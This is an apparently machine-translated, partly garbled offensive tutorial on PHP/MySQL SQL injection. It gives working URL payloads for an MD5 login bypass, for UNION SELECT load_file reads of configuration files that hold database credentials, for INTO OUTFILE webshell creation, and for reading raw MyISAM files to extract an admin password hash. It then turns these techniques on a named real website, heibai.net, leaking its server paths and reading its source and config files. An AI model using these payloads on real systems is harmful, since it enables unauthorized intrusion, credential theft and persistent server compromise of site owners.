PHP Injection 4

4. The nightmare of MD5
Dr. Wang of Shandong University has been doing MD5, we also come to make a mess, we are better than him, do not calculate, haha.
MD5 we have a way around, but not everywhere, PHP MD5 function can not bypass, because you enter everything in the inside, not run out. What can be bypassed is the MD5 in the SQL statement. Of course, other functions in SQL can also be bypassed, the same reason oh.
See Example first:
login.php
......
$query = "SELECT * from Alphaauthor where USERNAME=MD5 ($username) and password=". $Pw. " ";
......
?>
We submit directly in the browser
Http:/login.php?username=char (97,98)) or 1=1%23
Take into SQL statements as SELECT * from Alphaauthor where USERNAME=MD5 (char (97,98)) or 1=1 #) and password=. "$Pw."
Remember to put a character inside the MD5 because there is an or 1=2 behind it, so we put a char (97,98) randomly. Ok, the landing has been successful Oh! Look, MD5 is of no use to us.
5. Core technology, using php+mysql injection holes to write directly to Webshell.
Direct use of injection to get Webshell, this should be everyone very want it, the following will teach you.
This assumes that you already know the physical path where the site is located, and I assume that the site path is c:/apache/htdocs/site. The MySQL connection information of the website is put in/lib/sql.inc.php
1) applicable to Magic_quotes_gpc=off
Suppose we can upload pictures, or txt,zip, and so on, we'll change our Trojan to
JPG suffix, after uploading the path for/upload/2004091201.jpg
The content in 2004091201.jpg is
OK, let's start Http://localhost/site/display.php?id=451%20and%201=2%20%20union%20select%201,2,load_file (c:/apache/ htdocs/site/upload/2004091201.jpg), 4,5,6,7,8,9,10,11%20into%20outfile c:/apache/htdocs/site/shell.php
Because the outfile is applied, the Web page does not display properly, but our task is done.
As shown in Figure 28
Let's hurry and see Http://localhost/site/shell.php?cmd=dir.
As shown in Figure 29

Is it cool? Webshell we have created success. See the front 12? That's what we're outputting in select 1, 2!
2 The following is a suitable for magic_quotes_gpc=on time to save the Webshell method Oh, obviously can also be used in Magic_quotes_gpc=off time.
We read his profile directly, using technique 2 to introduce the method
Http://localhost/site/display.php?id=451%20and%201=2%20%20union%20select%201,2,load_file ( 0x433a2f6170616368652f6874646f63732f736974652f6c69622f73716c2e696e632e706870)
, 4,5,6,7,8,9,10,11
Get sql.inc.php content as

All right, we got the MySQL root password, and we found phpMyAdmin backstage.
http://localhost/phpmyadmin/
Use the root password for null landing.
As shown in Figure 30
Then we create a new table structure that reads as follows:

#
# The structure of the data table ' Te '
#
CREATE TABLE te (
CMD text not NULL
) Engine=myisam DEFAULT charset=latin1;

#
# Export the following database content ' Te '
#
INSERT into Te VALUES ();
Ok, it's time we got into outfile with select * from table.
SQL input directly in phpMyAdmin
SELECT * from ' te ' into outfile c:/apache/htdocs/site/cmd1.php;
As shown in Figure 31

Ok, successful execution, we go to http://localhost/site/cmd1.php?cmd=dir to see the effect go
As shown in Figure 32

That's a Webshell, right? Haha, I like it too.
But do not know whether we have found that we are in the magic_quotes_gpc=on of the case to complete the work, unexpectedly in the phpMyAdmin can not consider the limitations of quotes, haha, explain what? Description phpMyAdmin is too great, this is what we are talking about magic_quotes_gpc=on around the sale of that!
6. Found no we can also use update and insert to insert our data, and then to get our Webshell Oh, we also use the example above,
reg.php
......
$query = "INSERT into the Members
VALUES ($id, $login, $pass, $email, 2) ";
......
?>
We enter it at the place where we email.
Let's say we registered ID 10.
Then we can find another place to inject.
http://localhost/site/display.php?id=451%20and%201=2%20%20union%20select%201,2,email,4,5,6,7,8,9,10,11%20from% 20user%20where%20id=10%20 Into%20outfile c:/apache/htdocs/site/test.php
Well, we've got our Wenshell again.
7.mysql Cross-Library query
Everyone has been heard that MySQL can not cross-Library query Ah, haha, today I will teach you a good way, through this method to implement a disguised cross-Library query, the method is through Load_file to read directly from the MySQL dat

A folder under the contents of the file, so as to achieve abnormal cross-Library query.
For instance.
Before we do that, let's talk about the structure under MySQL's Data folder.
The Data folder has a folder that is generated by the name of the database, and under the folder, three three files with a suffix of frm,myd,myi are generated under the table name, for example
There are alpha databases in MySQL, with Alphaauthor and alphadb two tables in the Alpha library,
The Alpha folder contains the following figure 33

Where Alphadb.frm put the data in the LPHADB table, ALPHADB.FRM the structure of the table, alphadb.myi content with the version of MySQL will be different, specific can use Notepad to judge.
Experiment started
Suppose we know that there is another database yminfo210 exists and that there is information in the table user,user that is placed in this admin.
We
Http://localhost/site/display.php?id=451%20and%201=2%20%20union%20select%201,2,load_file (Yminfo210/user.myd), 4,5,6,7,8,9,10,11
To illustrate, load_file default directory is mysql under the data directory, so we use
Load_file (Yminfo210/user.myd), of course load_file (. Info210/user.myd) is also the same, note that the default path into OutFile is in the database folder in which it resides.

The result is as shown in Figure 34

Let's see what we read.
舼 ? Admin 698d51a19d8a121ce581499d7b701668 admin@yoursite.comadmin Question admin answer http://www.yoursite.com (? 靃? ka 靃  ? 靃?  127.0.0.1 D|?? AAA 3dbe00a167653a1aaee01d93e77e730e sdf@sd.com Sdfasdfsdfa asdfadfasd? e 麷 am 麷 a 127.0.0.1 222 222222223423
Although garbled a heap, but we can still see the user name is admin, the password is 698d51a19d8a121ce581499d7b701668, the rest is another information.
In this way we have achieved a curve across the library, the following example will also mention Oh!

Said so much below we come to the specific use once, the object of this test is a well-known security site-black and white network
You hear people say there's a loophole in black and white? Let's go and have a look.
Http://www.heibai.net/down/show.php?id=5403%20and%201=1
Normal display.
As shown in Figure 35

http://www.heibai.net/down/show.php?id=5403%20and%201=2
The display is not normal.
As shown in Figure 36

All right, let's go.
Http://www.heibai.net/down/show.php?id=5403%20and%201=1 Union Select 1
Display the results as follows
As shown in Figure 37

Note that the program name is not displayed in the picture, and it comes with
Warning:mysql_fetch_object (): supplied argument is isn't a valid MySQL result resource into D:\web\heibai\down\show.php on Li NE 45

Warning:mysql_fetch_array (): supplied argument is isn't a valid MySQL result resource into D:\web\heibai\down\global.php on L INE 578

Dizzy, the website path comes out, that can be dead certainly oh!
We went on until we guessed
http://www.heibai.net/down/show.php?id=5403%20and%201=1%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19
The normal display of the time.
As shown in Figure 38

Well we convert statements into
http://www.heibai.net/down/show.php?id=5403%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19
Displayed as shown in Figure 39

Take a look at the introduction to show 12, we can guess that this should be character type!
Ok, let's look at the contents of the file first
D:/web/heibai/down/show.php converted to ASCII for
char (100,58,47,119,101,98,47,104,101,105,98,97,105,47,100,111,119,110,47,115,
104,111,119,46,112,104,112)
We
view-source:http://www.heibai.net/down/show.php?id=5403%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,10,11 , Load_file (char (100,58,47,119,101,98,47,104,101,105,98,97,105,47,100,111,119,110,47,115,104,
111,119,46,112,104,112)), 13,14,15,16,17,18,19
View-source: Refer to the source code, as to why use, we will talk about later
Show it's source code
As shown in Figure 40

Because there is a sentence in the show.php

If we submit it directly in the browser, we'll jump to list.php.
We found this sentence require ("./include/config.inc.php");
Good thing, should put this profile, OK continue
d:/web/heibai/down/include/config.inc.php
Converted into char (100,58,47,119,101,98,47,104,101,105,98,97,105,47,100,111,119,110,47,105
, 110,99,108,117,100,101,47,99,111,110,102,105,103,46,105,110,99,46,112,104,112)
We enter